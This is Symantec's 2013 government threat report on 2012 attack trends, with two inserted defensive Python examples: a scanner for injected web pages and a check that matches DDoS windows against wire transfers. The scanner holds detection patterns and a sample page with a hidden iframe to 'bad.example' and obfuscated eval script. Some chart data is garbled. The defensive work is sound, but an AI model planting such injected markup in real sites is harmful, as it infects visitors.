Internet Security Threat Report: Government 2013<br />
2012 Trends, Volume 18, Published April 2013<br />
Symantec Corporation<br />
Internet Security Threat Report 2013 :: Volume 18<br />
CONTENTS<br />
Introduction<br />
Executive Summary<br />
2012 Security Timeline<br />
2012 in Numbers<br />
Targeted Attacks, Hacktivism, and Data Breaches<br />
  Introduction<br />
  Data<br />
  DDoS Used as a Diversion<br />
  Data Breaches<br />
  Analysis<br />
  Cyberwarfare, Cybersabotage, and Industrial Espionage<br />
  Advanced Persistent Threats and Targeted Attacks<br />
  Social Engineering and Indirect Attacks<br />
  Watering Hole Attacks<br />
Vulnerabilities, Exploits, and Toolkits<br />
  Introduction<br />
  Data<br />
  Analysis<br />
  Web-based Attacks on the Rise<br />
  The Arms Race to Exploit New Vulnerabilities<br />
  Malvertising and Website Hacking<br />
  Web Attack Toolkits<br />
  Website Malware Scanning and Website Vulnerability Assessment<br />
  The Growth of Secured Connections<br />
  Norton Secured Seal and Trust Marks<br />
  Stolen Key-signing Certificates<br />
Social Networking, Mobile, and the Cloud<br />
  Introduction<br />
  Data<br />
  Analysis<br />
  Spam and Phishing Move to Social Media<br />
  Mobile Threats<br />
  Cloud Computing Risks<br />
Malware, Spam, and Phishing<br />
  Introduction<br />
  Data<br />
  Spam<br />
  Phishing<br />
  Malware<br />
  Website Exploits by Type of Website<br />
  Analysis<br />
  Macs Under Attack<br />
  Rise of Ransomware<br />
  Long-term Stealthy Malware<br />
  Email Spam Volume Down<br />
  Advanced Phishing<br />
Looking Ahead<br />
Endnotes<br />
Appendix<br />
Introduction<br />
Symantec has established some of the most comprehensive sources of Internet threat data in the world through the Symantec Global Intelligence Network, which is made up of approximately 69 million attack sensors and records thousands of events per second. This network monitors threat activity in over 157 countries and territories through a combination of Symantec products and services, such as the Symantec DeepSight Threat Management System, Symantec Managed Security Services, and Norton consumer products, and other third-party data sources.<br />
In addition, Symantec maintains one of the world's most comprehensive vulnerability databases, currently consisting of more than 51,644 recorded vulnerabilities (spanning more than two decades) from over 16,687 vendors representing over 43,391 products.<br />
Spam, phishing, and malware data is captured through a variety of sources, including the Symantec Probe Network, a system of more than 5 million decoy accounts; Symantec.cloud; and a number of other Symantec security technologies. Skeptic, the Symantec.cloud proprietary heuristic technology, is able to detect new and sophisticated targeted threats before they reach customers' networks. Over 3 billion email messages and more than 1.4 billion Web requests are processed each day across 14 data centers. Symantec also gathers phishing information through an extensive antifraud community of enterprises, security vendors, and more than 50 million consumers.<br />
Symantec Trust Services provides 100 percent availability and processes over 4.5 billion Online Certificate Status Protocol (OCSP) look-ups per day, which are used for obtaining the revocation status of X.509 digital certificates around the world.<br />
These resources give Symantec's analysts unparalleled sources of data with which to identify, analyze, and provide informed commentary on emerging trends in attacks, malicious code activity, phishing, and spam. The result is the annual Symantec Internet Security Threat Report, which gives enterprises, small businesses, and consumers the essential information to secure their systems effectively now and into the future.<br />
Executive Summary<br />
Internet security threats are a growing and unique challenge to governments and public sector organizations. First, they must protect themselves against the same threats as the business sector: malware, data theft, vandalism, and hacktivism. Then they are targets in their own right for persistent attacks, espionage, and potentially even cyber attacks. Finally, government bodies, in collaboration with the private sector, have a responsibility to protect citizens, the economy, and national infrastructure against attack by hostile governments and non-state actors such as terrorist groups.<br />
In a recent speech to business executives, 1 the U.S. Secretary of Defense summarized the threat in powerful terms:<br />
"I know that when people think of cybersecurity today, they worry about hackers and criminals who prowl the Internet, steal people's identities, steal sensitive business information, steal even national security secrets. Those threats are real and they exist today. But the even greater danger – the greater danger facing us in cyberspace goes beyond crime and it goes beyond harassment. A cyber attack perpetrated by nation states [and] violent extremist groups could be as destructive as the terrorist attack on 9/11. Such a destructive cyberterrorist attack could virtually paralyze the nation."<br />
The most important trends in 2012 were:<br />
Cyberespionage and Targeted Attacks on the Rise<br />
We saw a 42 percent increase in targeted attacks, with more attacks aimed at smaller businesses, perhaps using them as a Trojan horse into their customers. This suggests that organizations need to pay attention to the security of their entire supplier ecosystem as well as their own systems. Attackers focus on junior employees just as much (if not more) as on executives and VIPs, often because their accounts are less well protected.<br />
Attackers continued to develop increasingly sophisticated ways to infiltrate protected systems. For example, they started using watering hole attacks, a technique in which malware planted on compromised third-party websites is used to target the employees who visit those sites. In this type of attack, attackers might infect the websites of lobby groups or policy think tanks in order to infect the government workers who browse them.<br />
Specialist Information Brokers<br />
It looks increasingly likely that specialist information brokerage businesses are the hired guns of cyberespionage. The scope and scale of attacks suggest that well-resourced organizations are able to attack dozens of targets simultaneously and to continuously research new zero-day attacks and attack software.<br />
Attackers Moving Away from Email<br />
Spam rates are down 29 percent, phishing attempts are down to one in 608 emails, and one in 291 emails contains a virus. While these attacks are in relative decline, social media is a new and growing battlefield. On the face of it, social networking does not appear to be a threat for the public sector, but in reality it gives attackers a treasure trove of personal information for identity theft and targeted attacks. It is also a new way to install malware on people's computers.<br />
Ill-protected Websites Put Us at Risk<br />
We saw a threefold increase in the number of Web-based attacks. Online criminals are using different techniques to infect legitimate websites, including attack toolkits and malvertising. A line or two of injected code on a Web page can be very difficult to detect, and it can infect thousands of visitors a day. Websites that are not well protected put other Web users at risk. As with watering hole attacks, the vulnerability of websites provides attackers with new and rapidly evolving ways to target individuals and organizations.<br />
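The "line or two of code" described above usually takes one of three forms on a compromised page: an iframe sized or styled so the visitor never sees it, an inline script assembled from escape sequences or eval chains, or a script tag pulling from a domain the site owner does not control. The scanner below is an added example written for this edition and is not code from the Symantec report; its heuristics, the allowed-host list, the hypothetical hosts and both sample pages are constructed for illustration, and a real website malware scan would also fetch and inspect the resources each tag references.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import urlparse


@dataclass
class Finding:
    rule: str      # which heuristic fired
    snippet: str   # the offending markup, truncated


# Rule 1: iframes sized to 0 or 1 pixel, hidden via CSS, or pushed far off-screen.
# Exploit-kit landing pages are commonly loaded this way so nothing is visible.
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I | re.S)
_HIDDEN = re.compile(
    r"(?:width|height)\s*=\s*[\"']?\s*[01]\b"
    r"|display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|(?:left|top)\s*:\s*-\d{3,}",
    re.I,
)

# Rule 2: inline scripts built from eval/unescape/fromCharCode chains or long
# runs of %xx or \xNN escapes, the usual fingerprint of toolkit-generated code.
_INLINE_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_OBFUSCATED = re.compile(
    r"eval\s*\(\s*(?:unescape|String\.fromCharCode|function)"
    r"|(?:%[0-9a-f]{2}){8,}"
    r"|(?:\\x[0-9a-f]{2}){8,}",
    re.I,
)

# Rule 3: external script sources whose host the site owner did not list.
_SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def scan_html(html: str, allowed_hosts: Tuple[str, ...] = ()) -> List[Finding]:
    """Return the suspicious constructs found in one page of HTML."""
    findings: List[Finding] = []

    for m in _IFRAME.finditer(html):
        tag = m.group(0)
        if _HIDDEN.search(tag):
            findings.append(Finding("hidden-iframe", tag[:80]))

    for m in _INLINE_SCRIPT.finditer(html):
        body = m.group(1)
        if _OBFUSCATED.search(body):
            findings.append(Finding("obfuscated-script", body.strip()[:80]))

    for m in _SCRIPT_SRC.finditer(html):
        src = m.group(1)
        # Scheme-relative "//host/x.js" is common in injections; give it a scheme
        # so urlparse yields the host. Site-relative paths have no host and are skipped.
        host = urlparse(src if "://" in src else "http:" + src).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(Finding("third-party-script", src[:80]))

    return findings


# Constructed sample pages (hypothetical hosts, not real sites).
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<script src="/js/app.js"></script>
<iframe src="https://www.example.gov/video" width="640" height="360"></iframe>
</body></html>"""

INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<script src="/js/app.js"></script>
<iframe src="http://bad.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65'));</script>
<script src="//stats.other.example/t.js"></script>
</body></html>"""


if __name__ == "__main__":
    for finding in scan_html(INJECTED_PAGE, allowed_hosts=("www.example.gov",)):
        print(f"{finding.rule:20} {finding.snippet}")
```

Run against a site's own pages on a schedule and diff the findings between runs: a page that suddenly gains a hidden iframe or a new third-party script host is the typical signature of the injections the report describes, even when the page otherwise looks untouched.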
Zero-day Vulnerabilities<br />
More zero-day vulnerabilities were found being actively exploited in the wild than in years past. A zero-day is a case where an attack exploits a previously unknown vulnerability before the vendor has made a patch available, as opposed to exploiting a vulnerability after it has been patched. While 8 zero-day vulnerabilities were discovered in 2011, 14 were found in 2012. The rise of zero-day attacks and polymorphic malware renders moot any defense based purely on virus signature recognition; organizations need multi-layered defenses.<br />
Mac Attacks<br />
2012 was the end of the era in which Mac computer users could plausibly claim immunity from malware. At least 600,000 Mac users were infected with the Flashback threat via a Java vulnerability. Having said that, beyond this one prevalent threat, Mac threats do not appear to have increased to any great extent. While the number of unique threats targeting the Mac is up, only about 2.5 percent of threats targeted Mac OS; the rest targeted Windows.<br />
Data Breaches Gain Focus<br />
At first glance, the numbers for data breaches paint a picture of an attack method in decline: there were fewer high-profile attacks, and the average number of identities exposed per breach is down significantly. Where there were 1.1 million identities exposed per breach in 2011, this number decreased by nearly half, to 604,826 in 2012. These numbers are likely down because of a concerted effort by the hacker groups Anonymous and LulzSec to publicize hacks during 2011, something that was not seen to the same extent in 2012. However, the global median is up, from 2,400 to 8,350 identities stolen per breach. Government agencies are particularly attractive targets for data thieves because they often hold valuable intellectual property (for example, patent offices) or personal information (for example, tax offices).<br />
The U.S. government has been warning public sector organizations for several years about the whole spectrum of Internet security threats. More recently, other governments have started addressing the issue. Governments around the world are waking up to the need to educate their constituents about security and to devote resources to improving defenses. Failure threatens more than a "cyber Pearl Harbor"; it could mean a loss of economic competitiveness and long-term economic decline.<br />
2012 Security Timeline<br />
January, February, March<br />
Data breach: 24 million identities stolen in a data breach at Zappos, an apparel retailer.<br />
Malcode: A scam involving malicious browser plug-ins for Firefox and Chrome is discovered.<br />
Botnet: The Kelihos botnet returns, four months after being taken down.<br />
Mobile: Google announces Google Bouncer, an app scanner for the Google Play market.<br />
Botnet: Researchers take down a new variant of the Kelihos botnet, which reappears in a new form later in the month.<br />
Hacks: Six individuals are arrested as alleged members of the hacking collective LulzSec.<br />
Botnet: Security researchers take down key servers for the Zeus botnet.<br />
Data breach: A payment processor for a number of well-known credit card companies, including Visa and MasterCard, is compromised, exposing details of 1.5 million accounts. 2<br />
Mobile: A non-malware-based scam involving the Opfake gang is found that targets iPhone users.<br />
April, May, June<br />
Mac: Over 600,000 Mac computers are infected by the OSX.Flashback Trojan through an unpatched Java vulnerability.<br />
Mac: A second Mac Trojan, OSX.Sabpab, is discovered; it also uses Java exploits to compromise a computer.<br />
Social networking: Scammers are discovered leveraging the social networks Tumblr and Pinterest.<br />
Malware: The cyberespionage threat W32.Flamer is discovered.<br />
Certificate Authorities: Comodo, a large Certificate Authority, authenticates and issues a legitimate code-signing certificate to a fictitious organization run by cybercriminals. This is not discovered until August.<br />
Data breach: LinkedIn suffers a data breach, exposing millions of accounts.<br />
Malware: A Trojan named Trojan.Milicenso is discovered, which causes networked printers to print large print jobs containing illegible characters.<br />
July, August<br />
Botnet: Security researchers disable the Grum botnet.<br />
Malware: Windows malware is discovered in Apple's App Store, embedded in an application.<br />
Mac: A new Mac threat called OSX.Crisis opens a back door on compromised computers.<br />
Botnet: DNS servers maintained by the FBI in order to keep computers previously infected with the DNSChanger Trojan safe are shut off.<br />
Malware: A Trojan used to steal information from the Japanese government is discovered after two years in operation.<br />
Malware: A second printer-related threat, W32.Printlove, which causes large print jobs to print garbage, is discovered.<br />
Hacks: The Reuters news service suffers a series of hacks resulting in fake news stories posted on its website and Twitter account.<br />
Malware: Crisis malware is discovered targeting VMware virtual machine images.<br />
Malware: W32.Gauss is discovered. The threat is concentrated in the Middle East, in a similar way to W32.Flamer.<br />
Certificate Authorities: The Comodo incident from May is discovered and details are published.<br />
September, October, November, December<br />
Malware: A new version of the Blackhole attack toolkit, dubbed Blackhole 2.0, is discovered.<br />
Botnet: Security researchers disable an up-and-coming botnet known as "Nitol."<br />
Mobile: A vulnerability is discovered in Samsung's version of Android that allows a phone to be remotely wiped.<br />
DDoS: The FBI issues a warning about possible DDoS attacks against financial institutions being used as a "distraction" technique. 3<br />
Malware: A ransomware threat distributed through Skype IM is discovered.<br />
Data breach: Customer data is stolen from Barnes & Noble payment keypads.<br />
DDoS: Attackers are discovered using a DDoS attack as a distraction in order to gather information that allowed them to later steal money from a targeted bank.<br />
Hacks: Burglars are found using a known exploit in a brand of hotel locks to break into hotel rooms.<br />
Malware: The Infostealer.Dexter Trojan horse is discovered targeting point-of-sale systems.<br />
Hacks: Attackers exploit a vulnerability in Tumblr, spreading spam throughout the social network.<br />
2012 in Numbers<br />
Targeted attacks in 2012: 42% increase<br />
New vulnerabilities: 2010: 6,253; 2011: 4,989; 2012: 5,291<br />
Mobile vulnerabilities: 2010: 163; 2011: 315; 2012: 415<br />
Average number of identities exposed per breach in 2012: 604,826<br />
Estimated global email spam per day (in billions): 2010: 62; 2011: 42; 2012: 30<br />
Overall spam rate: 2010: 89%; 2011: 75%; 2012: 69%<br />
Percentage of all spam with dating and sexual content: 2010: 3%; 2011: 15%; 2012: 55%<br />
Overall email virus rate (1 in): 2010: 282; 2011: 239; 2012: 291<br />
Overall email phishing rate (1 in): 2010: 442; 2011: 299; 2012: 414<br />
Percentage of all email malware delivered as a URL: 2010: 24%; 2011: 39%; 2012: 23%<br />
Bot zombies (in millions): 2010: 4.5; 2011: 3.1; 2012: 3.4<br />
Mobile malware families, increase 2011–2012: 58%<br />
New zero-day vulnerabilities: 2010: 14; 2011: 8; 2012: 14<br />
Web attacks blocked per day: 2011: 190,370; 2012: 247,350<br />
New unique malicious Web domains: 2010: 43,000; 2011: 55,000; 2012: 74,000<br />
Targeted Attacks, Hacktivism, and Data Breaches<br />
Introduction<br />
"Just as nuclear was the strategic warfare of the industrial era, cyberwarfare has become the strategic war of the information era," says U.S. Secretary of Defense Leon Panetta. 4<br />
Cyberespionage and cybersabotage are already a reality. Outside the realm of states and their proxies, corporate spies are using increasingly advanced techniques to steal company secrets or customer data for profit. Hacktivists with political and anti-business agendas are also busy.<br />
The string of media revelations about security breaches this year suggests that the business world is just as vulnerable to attack as ever.<br />
Data<br />
Targeted Attacks Per Day in 2012 (Source: Symantec; chart of monthly averages, January to December, on a scale of 0 to 250 attacks per day)<br />
We witnessed one large attack in April against a single client that more than doubled the number of attacks per day for that month; while events like this are extremely rare, we have not included it in this calculation in order to portray a more realistic outlook. This incident would have skewed the global annual average number of attacks per day from 116 to 143.<br />
This client was a large banking organization that had not previously been a Symantec customer and approached Symantec for help to remove an existing infection. The infection was removed; however, a large wave of targeted attacks followed as the attackers sought to regain access, ultimately failing.<br />
At a glance<br />
• Targeted attack global average per day: 116.<br />
• Increasing levels of industrial espionage and data theft.<br />
• More insidious targeted attacks, with new "watering hole" attacks and sophisticated social engineering.<br />
• Fewer big data breaches, but the median number of identities stolen per breach has increased by 3.5 times.<br />
Top 10 Industries Attacked in 2012 (Source: Symantec; share of targeted attacks)<br />
Manufacturing: 24%<br />
Finance, Insurance & Real Estate: 19%<br />
Services – Non-Traditional: 17%<br />
Government: 12%<br />
Energy/Utilities: 10%<br />
Services – Professional: 8%<br />
Aerospace: 2%<br />
Retail: 2%<br />
Wholesale: 2%<br />
Transportation, Communications, Electric, Gas: 1%<br />
Manufacturing was the most-targeted sector in 2012, with 24 percent of targeted attacks destined for this sector, compared with 15 percent in 2011. Attacks against government and public sector organizations fell from 25 percent in 2011, when it was the most targeted sector, to 12 percent in 2012. It is likely that frontline attacks are moving down the supply chain, particularly to small and medium-sized businesses. (Categories are based on Standard Industrial Classification codes.)<br />
Attacks by Size of Targeted Organization (Source: Symantec; share of targeted attacks in 2012 by employee count, with the 2011 share where the chart gives it)<br />
2,501+: 50% (about 50% in 2011)<br />
1,501 to 2,500: 9%<br />
1,001 to 1,500: 2%<br />
501 to 1,000: 3%<br />
251 to 500: 5%<br />
1 to 250: 31% (18% in 2011)<br />
Organizations with 2,501+ employees were the most targeted, with 50 percent of targeted attacks destined for this size of organization, almost exactly the same percentage as in 2011. The volume of targeted attacks against organizations with 2,501+ employees doubled compared with 2011, although their overall percentage remains the same at 50 percent.<br />
Targeted attacks destined for small businesses (1 to 250 employees) accounted for 31 percent of all attacks, compared with 18 percent in 2011, an increase of 13 percentage points. The volume of attacks against SMBs increased threefold compared with 2011, resulting in their percentage almost doubling from 18 percent to 31 percent.<br />
Targeted Attack Recipients by Role in 2012 (Source: Symantec; share of targeted attacks by recipient role, 2011 versus 2012, charted with the percentage-point change)<br />
Research & Development: 9% in 2011, 27% in 2012<br />
Sales: 12% in 2011, 24% in 2012<br />
Chief Executive or Board Level: 25% in 2011, 17% in 2012<br />
Also charted: PR and Marketing; Personal Assistant; Human Resources; Senior Management; Shared Mailbox (info@, sales@, etc.).<br />
DDoS Used as a Diversion<br />
In September, the FBI issued a warning to financial institutions that some DDoS attacks are actually being used as a "distraction." These attacks are launched before or after cybercriminals engage in an unauthorized transaction and are an attempt to avoid discovery of the fraud and to prevent attempts to stop it.<br />
In these scenarios, attackers target a company's website with a DDoS attack. They may or may not bring the website down, but that is not the main focus of such an attack; the real goal is to divert the attention of the company's IT staff towards the DDoS attack. Meanwhile, the hackers attempt to break into the company's network using any number of other methods that may go unnoticed while the DDoS attack continues in the background. 5<br />
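The operational lesson of the distraction pattern just described is to stop treating the flood and the fraud as separate incidents: when a DDoS alert fires, payment activity in a window around it should be pulled for review, including activity shortly before the flood began. The correlation below is an added example written for this edition, not code from the Symantec report or the FBI warning; the log formats, the 30-minute slack, the amount threshold, the "first-time payee" flag and every sample line are constructed.

```python
from datetime import datetime, timedelta
from typing import Any, Dict, List, Tuple

# Constructed DDoS-sensor log (hypothetical format: ISO timestamp, event, key=value pairs).
DDOS_LOG = """\
2012-09-24T09:58:00Z ddos_start target=www.example-bank.test pps=2100000
2012-09-24T11:40:00Z ddos_end target=www.example-bank.test
"""

# Constructed wire-transfer log. 'known=no' means the beneficiary has never been
# paid from this account before.
TRANSFER_LOG = """\
2012-09-24T08:15:00Z acct=10442 amount=1200.00 beneficiary=B-7781 known=yes
2012-09-24T10:05:00Z acct=10442 amount=248000.00 beneficiary=B-9932 known=no
2012-09-24T10:20:00Z acct=20019 amount=900.00 beneficiary=B-0210 known=yes
2012-09-24T10:31:00Z acct=30500 amount=175000.00 beneficiary=B-9932 known=no
2012-09-24T15:00:00Z acct=10442 amount=50000.00 beneficiary=B-9932 known=no
"""


def parse_line(line: str) -> Dict[str, Any]:
    """Split 'TS token key=value ...' into a dict; a bare token becomes 'event'."""
    ts, *fields = line.split()
    rec: Dict[str, Any] = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        if "=" in field:
            key, value = field.split("=", 1)
            rec[key] = value
        else:
            rec["event"] = field
    return rec


def ddos_windows(log: str, slack: timedelta = timedelta(minutes=30)) -> List[Tuple[datetime, datetime]]:
    """One (start, end) interval per attack, widened by `slack` on both sides
    because the fraudulent transaction may precede or follow the flood."""
    windows: List[Tuple[datetime, datetime]] = []
    start = None
    for line in log.splitlines():
        rec = parse_line(line)
        if rec.get("event") == "ddos_start":
            start = rec["ts"]
        elif rec.get("event") == "ddos_end" and start is not None:
            windows.append((start - slack, rec["ts"] + slack))
            start = None
    if start is not None:  # attack still in progress at the end of the log
        windows.append((start - slack, datetime.max))
    return windows


def suspicious_transfers(transfer_log: str, windows: List[Tuple[datetime, datetime]],
                         min_amount: float = 100000.0) -> List[Tuple[str, str, str, str]]:
    """Transfers inside a DDoS window that are large or go to a first-time payee."""
    hits: List[Tuple[str, str, str, str]] = []
    for line in transfer_log.splitlines():
        rec = parse_line(line)
        ts = rec["ts"]
        in_window = any(lo <= ts <= hi for lo, hi in windows)
        large = float(rec["amount"]) >= min_amount
        new_payee = rec.get("known") == "no"
        if in_window and (large or new_payee):
            hits.append((ts.isoformat(), rec["acct"], rec["amount"], rec["beneficiary"]))
    return hits


if __name__ == "__main__":
    for hit in suspicious_transfers(TRANSFER_LOG, ddos_windows(DDOS_LOG)):
        print("review:", *hit)
```

On the constructed data the two large transfers to a never-before-seen beneficiary inside the attack window are flagged, while the same beneficiary being paid again hours later is not; that second payment is exactly the kind of follow-on a reviewer would then pull manually, which is why the window is a triage aid rather than the whole control.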
The recipients-by-role chart shows that in 2012 the most frequently targeted job role was in R&D, which accounted for 27 percent of attacks (9 percent in 2011). The second most notable increase was against sales representatives, probably because their contact details are more widely available in the public domain, with 24 percent of attacks in 2012 versus 12 percent in 2011. In 2011, C-level executives were the most targeted, with 25 percent, but this fell to 17 percent in 2012.<br />
Data Breaches<br />
The overall number of data breaches is down by 26 percent, according to the Norton Cybercrime Index, 6 though over 93 million identities were exposed during the year, a decrease of 60 percent from last year. The average number of identities stolen is also down this year: at 604,826 per breach, it is significantly smaller than the 1.1 million per breach in 2011.<br />
So why are the numbers of breaches and identities stolen down in 2012? For starters, there were five attacks in which more than 10 million identities were stolen in 2011. In 2012 there was only one, which results in a much smaller spread from the smallest to the largest data breach. However, the median number, the midpoint of the data set, increased by 3.5 times in 2012, from 2,400 to 8,350 per breach. The median is a useful measure because it ignores the extremes, the rare events that resulted in large numbers of identities being exposed, and is more representative of the underlying trend.<br />
Part of the wide difference between data breaches in 2011 and 2012 is likely due to a concerted effort by the notorious hacker groups Anonymous and LulzSec to publicize hacks during 2011, something that was not seen to the same extent in 2012. It is also possible that companies are paying more attention to protecting customer databases, that hackers have found other, more valuable targets, or that they are still stealing the data but not being detected.<br />
Healthcare, education, and government accounted for nearly two-thirds of all identities breached in 2012. This suggests that the public sector should further increase its efforts to protect personal information, particularly considering how these organizations are often looked upon as the custodians of information for the most vulnerable in society. Alternatively, this could indicate that the private sector may not be reporting all data breaches, given how many public sector organizations are required by law to report breaches.<br />
The vast majority (88 percent) of reported data breaches were due to attacks by outsiders. But it is safe to assume that unreported data breaches outnumber reported ones. Whether it is lost laptops, misplaced memory sticks, deliberate data theft by employees, or accidents, the insider threat also remains high. To illustrate this point, the UK Information Commissioner's Office fined and prosecuted more businesses because of insider slip-ups than because of outsider attacks. Most SMBs should worry about someone in accounts just as much as they should worry about an anonymous hacker.<br />
Data Breaches by Sector in 2012 (Source: Symantec; share of disclosed breaches)<br />
Healthcare: 36%<br />
Education: 16%<br />
Government: 13%<br />
Accounting: 9%<br />
Computer Software: 6%<br />
Financial: 6%<br />
Information Technology: 5%<br />
Telecom: 4%<br />
Computer Hardware: 3%<br />
Community and Nonprofit: 3%<br />
At 36 percent, the healthcare industry continues to be the sector responsible for the largest percentage of disclosed data breaches by industry.<br />
Timeline of Data Breaches (Source: Symantec; monthly chart, January to December 2012, plotting the number of incidents and the sum of identities breached in millions, 31 million of them in January)<br />
January saw the largest number of identities stolen in 2012, due to one breach of over 24 million identities, while the numbers for the rest of the year mostly fluctuated between one and 12 million identities stolen per month.<br />
The average number of breaches per month for the first half of the year was 11, and rose to 15 in the second half of the year, a 44 percent increase.<br />
Average Cost Per Capita of a Data Breach 7 (Source: Symantec)<br />
Country: Average Cost Per Capita<br />
U.S.: $194<br />
Denmark: $191<br />
France: $159<br />
Australia: $145<br />
Japan: $132<br />
UK: $124<br />
Italy: $102<br />
Indonesia: $42<br />
At US$194, the United States is the country with the highest cost per capita, with Denmark a close second at $191.<br />
Analysis<br />
Cyberwarfare, Cybersabotage, and Industrial Espionage<br />
Targeted attacks have become an established part of the threat landscape, and safeguarding against them has become one of the main concerns of CISOs and IT managers. Targeted attacks are commonly used for the purposes of industrial espionage, to gain access to the confidential information on a compromised computer system or network. They are rare but potentially the most difficult attacks to defend against.<br />
It is difficult to attribute an attack to a specific group or a government without sufficient evidence. The motivation and the resources of the attacker sometimes hint at the possibility that the attacker is state sponsored, but finding clear evidence is difficult. Attacks that could be state sponsored appear to be rare in comparison with regular cybercrime, but they have often gained more notoriety, and they can be among the most sophisticated and damaging of these types of threats.<br />
Governments are undoubtedly devoting more resources to<br />
Top Causes of data breaches in 2012<br />
Source: Symantec<br />
0 10 20 30 40 50<br />
8 %<br />
6 %<br />
1 %<br />
Fraud<br />
23<br />
23 %<br />
Insider theft<br />
Unknown<br />
40 %<br />
Hackers<br />
% Accidentally<br />
made public<br />
Theft or loss<br />
of computer<br />
or drive<br />
Hackers continue to be responsible for the largest number of<br />
data breaches, making up 40 percent of all breaches.<br />
defensive and offensive cyberwarfare capabilities. In 2012, it<br />
was still unlikely that most businesses would encounter such<br />
an attack, and the greatest risk comes from the more prevalent<br />
targeted attacks that are created for the purposes of industrial<br />
espionage. Increasingly, small to medium-sized businesses<br />
(SMB) are finding themselves on the frontline of these targeted<br />
attacks as they have fewer resources to combat the threat<br />
and a successful attack here may subsequently be used as the<br />
springboard to further attacks against a larger organization to<br />
which they may be a supplier.<br />
Malware such as Stuxnet in 2010, Duqu in 2011, and Flamer and<br />
Disttrack in 2012 show increasing levels of sophistication and<br />
danger. For example, the malware used in the Shamoon attacks<br />
on a Saudi oil firm had the ability to wipe hard drives. 8<br />
The same techniques used by cybercriminals for industrial<br />
espionage may also be used by states and state proxies for<br />
cyber attacks and political espionage. Sophisticated attacks may<br />
be reverse-engineered and copied so that the same or similar
p. 20<br />
techniques can be used in less discriminate attacks. A further<br />
risk is that malware developed for cybersabotage may spread<br />
beyond its intended target and infect other computers in a kind<br />
of collateral damage.<br />
Timeline of Targeted Attacks 9<br />
Source: Symantec<br />
2009<br />
• Ghostnet, March 2009: large-scale cyberspying operation<br />
2010<br />
• Hydraq, January 2010: Operation “Aurora”<br />
• Stuxnet, June 2010<br />
2011<br />
• RSA Attacks, August 2011<br />
Advanced Persistent Threats and Targeted Attacks<br />
Targeted attacks combine social engineering and malware to<br />
target individuals in specific companies with the objective<br />
of stealing confidential information such as trade secrets or<br />
customer data. They often use custom-written malware and<br />
sometimes exploit zero-day vulnerabilities, which makes them<br />
harder to detect and potentially more infective.<br />
Targeted attacks use a variety of vectors as their main delivery<br />
mechanism, such as malware delivered in an email, or drive-by<br />
downloads from an infected website the intended recipient<br />
is known to frequent, a technique known as a “watering hole”<br />
attack.<br />
APTs are often highly sophisticated and more insidious than<br />
traditional attacks, relying on highly customized intrusion<br />
techniques. While targeted attacks are growing increasingly<br />
common, the resources required to launch an advanced<br />
persistent threat campaign mean they are limited to well-funded<br />
groups attacking high-value targets.<br />
Timeline of Targeted Attacks (continued)<br />
• Nitro Attacks, July–October 2011: against the chemical industry<br />
• Sykipot / Taidoor Attacks: targeting the defense industry and governments<br />
2012<br />
• Flamer & Gauss, May 2012 – Aug 2012: highly sophisticated threat targeting the Middle East<br />
Symantec saw a 42 percent increase in the targeted attack rate<br />
in 2012 compared with the preceding 12 months. While the<br />
manufacturing industry has become the main target accounting<br />
for 24 percent of attacks, we also saw a wide range of companies<br />
coming under attack, not only large businesses, but increasingly<br />
SMBs as well. In 2011, 18 percent of targeted attacks were aimed<br />
at companies with fewer than 250 employees, but by the end of<br />
2012, they accounted for 31 percent.<br />
Timeline of Targeted Attacks (continued)<br />
• Elderwood Project, September 2012: main target: defense. Same group identified using Hydraq (Aurora) in 2009<br />
Social Engineering and Indirect Attacks<br />
Attackers may be targeting smaller businesses in the supply<br />
chain because they are more vulnerable, have access to<br />
important intellectual property, and offer a stepping stone<br />
into larger organizations. In addition, they are also targeted<br />
in their own right. They are more numerous than enterprises,<br />
have valuable data, and are often less well-protected than<br />
larger companies. For example, an attacker may infiltrate a<br />
small supplier in order to use it as a spring board into a larger<br />
company. They might use personal information, emails, and files<br />
from an individual in such a smaller company to create a well-crafted<br />
email aimed at someone in a target company.<br />
p. 21<br />
Web Injection Process Used in Watering Hole Attacks 10<br />
Source: Symantec<br />
1. Attacker profiles victims and the kind of websites they go to.<br />
2. Attacker then tests these websites for vulnerabilities.<br />
3. When the attacker finds a website that he can compromise, he injects<br />
JavaScript or HTML, redirecting the victim to a separate site that hosts the<br />
exploit code for the chosen vulnerability.<br />
4. The compromised website is now “waiting” to infect the profiled victim<br />
with a zero-day exploit, just like a lion waiting at a watering hole.<br />
In 2012, we saw a big increase in attacks on people in<br />
R&D and sales roles compared to the previous year.<br />
This suggests that attackers are casting a wider net and<br />
targeting less senior positions below the executive level in<br />
order to gain access to companies. The increase in attacks<br />
has been particularly high overall in these two areas. Still,<br />
attacks in other areas, such as back-office roles, are still a<br />
significant threat.<br />
Attackers continue to use social engineering techniques<br />
in targeted attacks. For example, messages impersonating<br />
EU officials, messages that appear to come from <strong>security</strong><br />
agencies in the United States and target other government<br />
officials, or messages that piggyback announcements<br />
about new procurement plans from potential government<br />
clients such as the U.S. Air Force. This shows extensive<br />
research, a sophisticated understanding of the motivation<br />
of recipients, and makes it much more likely that victims<br />
will open attachments that contain malware.<br />
Watering Hole Attacks<br />
The biggest innovation in targeted attacks was the<br />
emergence of watering hole attacks. This involves<br />
compromising a legitimate website that a targeted victim<br />
might visit and using it to install malware on their<br />
computer. For example, this year we saw a line of code in a<br />
tracking script 11 on a human rights organization’s website<br />
with the potential to compromise a computer. It exploited<br />
a new, zero-day vulnerability in Internet Explorer® to<br />
infect visitors. Our data showed that within 24 hours,<br />
people in 500 different large companies and government<br />
organizations visited the site and ran the risk of infection.<br />
The attackers in this case, known as the Elderwood<br />
Gang, used sophisticated tools and exploited zero-day<br />
vulnerabilities in their attacks, pointing to a well-resourced<br />
team backed by a large criminal organization<br />
or a nation state. 12
p. 22<br />
Recommendations<br />
Assume You’re a Target.<br />
